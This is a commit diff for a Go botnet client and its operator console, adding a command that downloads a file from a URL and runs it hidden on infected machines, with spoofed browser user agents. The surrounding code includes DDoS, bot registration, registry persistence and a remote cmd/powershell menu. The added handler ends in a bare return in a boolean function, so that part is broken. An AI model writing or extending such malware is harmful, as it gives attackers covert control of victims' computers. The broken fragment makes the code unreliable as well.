✅ Update v1.2.1

1. Add exec command
2. Other fixes

Author: unknown

client/components/core.go

@@ -3,6 +3,7 @@ package components
 import (
 	"log"
 	"os"
+	"strings"
 	"time"
 
 	"golang.org/x/sys/windows/registry"
@@ -13,7 +14,25 @@ func do_register_bot(pkg *ServerReply, host string) bool {
 }
 
 func do_remote_download_execute(pkg *ServerReply, host string) bool {
-	return false
+	commandline := pkg.Args["args"]
+	strArgs := strings.Fields(commandline.(string))
+	option := ""
+
+	// Collect options if it exists
+	if len(strArgs) > 1 {
+		for i := 1; i < len(strArgs); i++ {
+			option += (strArgs[i] + " ")
+		}
+		option = strings.TrimSpace(option)
+	}
+	// Remote download and execute
+	ok := remote_execute(strArgs[0], pkg.Args["hidden"].(bool), option)
+
+	var reply ServerReply
+	reply.Args = make(map[string]any)
+	reply.Headers = make(map[string]string)
+
+	return
 }
 
 func do_ddos_attack(pkg *ServerReply, host string) bool {
@@ -59,6 +78,7 @@ func send_poll_request(host string) BotState {
 	if reply == nil || !check_package_legality(reply) {
 		return StateCommandPoll
 	}
+	reply.Cmd = strings.TrimSpace(reply.Cmd)
 
 	switch reply.Cmd {
 	case "register":
@@ -103,7 +123,6 @@ func auth_bot_poll(state BotState, host string) BotState {
 				break
 			}
 		}
-
 		next_state = StateGenGuid
 	case StateReadToken:
 		val := reg_read_key(registry.CURRENT_USER, g_regpath, "token", false)

client/components/functions.go

@@ -1,15 +1,31 @@
 package components
 
 import (
+	"log"
 	"net/http"
+	"net/url"
 	"os/exec"
-	"strings"
+	"runtime"
+	"syscall"
 )
 
-func downloader(mode string, content string, md5 string, params string) {
-	if mode == "0" {
-
+func remote_execute(path string, hidden bool, args ...string) bool {
+	// Check if it's an URL or not
+	u, err := url.Parse(path)
+	if err != nil {
+		return false
+	}
+	if u.Scheme != "" && u.Host != "" {
+		// Ye, it is url, download it from remote host
+		path = download_from_url(path, "")
+		if path == "" {
+			// Failed to download
+			log.Println("Failed to remote download")
+			return false
+		}
 	}
+
+	return start_exe(path, hidden, args...)
 }
 
 func openurl(url string, mode string) bool {
@@ -26,18 +42,31 @@ func openurl(url string, mode string) bool {
 	return err != nil
 }
 
-func start_exe(name string) bool {
-	if strings.Contains(name, ".exe") {
-		var final_name string
-		binary, err := exec.LookPath(name)
-		if err != nil {
-			final_name = name
-		} else {
-			final_name = binary
+func start_exe(name string, hidden bool, args ...string) bool {
+	// binary, err := exec.LookPath(name)
+	// if err != nil {
+	// 	final_name = name
+	// } else {
+	// 	final_name = binary
+	// }
+
+	cmd := exec.Command(name, args...)
+	switch runtime.GOOS {
+	case "windows":
+		if hidden {
+			cmd.SysProcAttr = &syscall.SysProcAttr{
+				HideWindow: true,
+			}
+		}
+	default:
+		exec.Command("chmod", "+x", name).Run()
+		if hidden {
+			cmd.Stdout = nil
+			cmd.Stderr = nil
 		}
-		return exec.Command(final_name).Start() == nil
 	}
-	return false
+
+	return cmd.Start() == nil
 }
 
 func kill(name string) bool {

client/components/global.go

@@ -73,7 +73,7 @@ var (
 	pfnGetCurrentProcess   = kernel32.NewProc("GetCurrentProcess")
 
 	botcore = BotCore{
-		version:      "1.2.0",
+		version:      "1.2.1",
 		hosts:        []string{"127.0.0.1:8080"},
 		singleton:    true,
 		anti_debug:   false,
@@ -133,6 +133,15 @@ type ServerReply struct {
 	Headers map[string]string `json:"-"`
 }
 
+type Report struct {
+	Guid    string         `json:"guid"`
+	TaskID  string         `json:"task_id"`
+	Success bool           `json:"success"`
+	Output  string         `json:"output"`
+	Error   string         `json:"error"`
+	Extra   map[string]any `json:"extra"`
+}
+
 type Client struct {
 	Id          int    `json:"id"`
 	Guid        string `json:"guid"`

client/components/net.go

@@ -8,7 +8,11 @@ import (
 	"io"
 	"log"
 	"net/http"
+	"os"
+	"path"
+	"path/filepath"
 	"strconv"
+	"time"
 )
 
 var clientHTTP = &http.Client{
@@ -167,3 +171,74 @@ func check_package_legality(pkg *ServerReply) bool {
 
 	return true
 }
+
+func download_from_url(url, file_name string) string {
+	// HTTP agent with overtime limitation
+	client := &http.Client{
+		Timeout: 20 * time.Second,
+	}
+
+	// Create a new HTTP GET request
+	req, err := http.NewRequest("GET", url, nil)
+	if err != nil {
+		return ""
+	}
+	// Create a fake UA
+	var UserAgents = []string{
+		"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36",
+		"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edg/124.0.0.0 Safari/537.36",
+		"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.4 Safari/605.1.15",
+		"Mozilla/5.0 (Macintosh; Intel Mac OS X 13_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36",
+		"Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1",
+		"Mozilla/5.0 (Linux; Android 13; SM-G988B) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Mobile Safari/537.36",
+		"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36",
+		"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0",
+		"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:125.0) Gecko/20100101 Firefox/125.0",
+		"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36",
+		"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Electron/29.1.0 Chrome/122.0.0.0 Safari/537.36",
+		"Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)",
+	}
+	// Set HTTP header and send GET request
+	req.Header.Set("User-Agent", UserAgents[g_seed.Intn(len(UserAgents))])
+	resp, err := client.Do(req)
+	if err != nil {
+		return ""
+	}
+	defer resp.Body.Close()
+
+	// Check statuscode of http response
+	if resp.StatusCode != 200 {
+		return ""
+	}
+
+	// Build save path
+	final_file_path := ""
+	temp_file_name := ""
+
+	if file_name == "" {
+		// If user doesn't specfiy file path, try to parse it from url
+		temp_file_name = path.Base(resp.Request.URL.Path)
+		if temp_file_name == "" || temp_file_name == "/" {
+			// Oops, no? use default
+			temp_file_name = random_string(random_int(5, 17)) + ".exe"
+		}
+
+	} else {
+		temp_file_name = file_name
+	}
+	final_file_path = filepath.Join(os.TempDir(), temp_file_name)
+
+	// Create file
+	f, err := os.Create(final_file_path)
+	if err != nil {
+		return ""
+	}
+	defer f.Close()
+
+	_, err = io.Copy(f, resp.Body)
+	if err != nil {
+		return ""
+	}
+
+	return final_file_path
+}

server/common/global.go

@@ -11,7 +11,7 @@ var (
 	Seed               = rand.New(rand.NewSource(time.Now().UnixNano()))
 	Cfg                = Config{}
 	Db         *sql.DB = nil
-	Version            = "v1.2.0"
+	Version            = "v1.2.1"
 	Account            = ""
 	CurrentBot int64   = 5
 	Mutex      sync.Mutex

server/main.go

@@ -39,7 +39,7 @@ func show_bot_info(bot *common.Client) {
 	fmt.Println("🐾 --------------------------------------------------- 🐾")
 	fmt.Printf("👣 ID: %d\n", bot.Id)
 	fmt.Println("🏴 Guid: " + bot.Guid)
-	fmt.Println("🌍 IP: " + bot.Ip)
+	fmt.Println("🌐 IP: " + bot.Ip)
 	fmt.Println("👽 Who: " + bot.Whoami)
 	fmt.Println("💻 OS: " + bot.Os)
 	install, _ := strconv.ParseInt(bot.Installdate, 10, 64)
@@ -63,7 +63,7 @@ func show_bot_info(bot *common.Client) {
 
 func help_handler() {
 	fmt.Println("1. help/h: Show help menu")
-	fmt.Println("2. exec path/url [args]: Execute executable file or download from host and execute")
+	fmt.Println("2. exec [-h] path/url [args]: Execute executable file or download from host and execute, option -h decides if hidden execute")
 	fmt.Println("3. cmd/pws: Remote cmd or powershell")
 	fmt.Println("4. list: Show all bots")
 	fmt.Println("5. info id: Show bot info which ID is id")
@@ -96,11 +96,22 @@ func select_handler(ary []string) {
 
 func exec_handler(ary []string) {
 	if len(ary) < 2 {
-		fmt.Println("[-] Usage: exec path/url [args], please enter help command")
+		fmt.Println("[-] Usage: exec [-h] path/url [args], please enter help command")
 		return
 	}
 	var options string = ""
-	for i := 1; i < len(ary); i++ {
+	var hidden bool = false
+
+	if ary[1] == "-h" {
+		hidden = true
+	}
+
+	i := 1
+	if hidden {
+		i++
+	}
+
+	for ; i < len(ary); i++ {
 		options += " " + ary[i]
 	}
 	options = strings.TrimSpace(options)
@@ -126,7 +137,7 @@ func exec_handler(ary []string) {
 	sqlStr = "insert into tasks (bot_id, command_id, args, status) values (?,?,?,?)"
 	map_args := map[string]interface{}{
 		"args":   options,
-		"hidden": "false",
+		"hidden": hidden,
 	}
 	byt, _ := json.Marshal(map_args)
 	_, err = db1.Insert(common.Db, sqlStr, common.CurrentBot, command_id, byt, "queued")
@@ -289,7 +300,6 @@ func main() {
 		case "mode":
 			mode_handler(cmdAry)
 		}
-
 	}
 
 }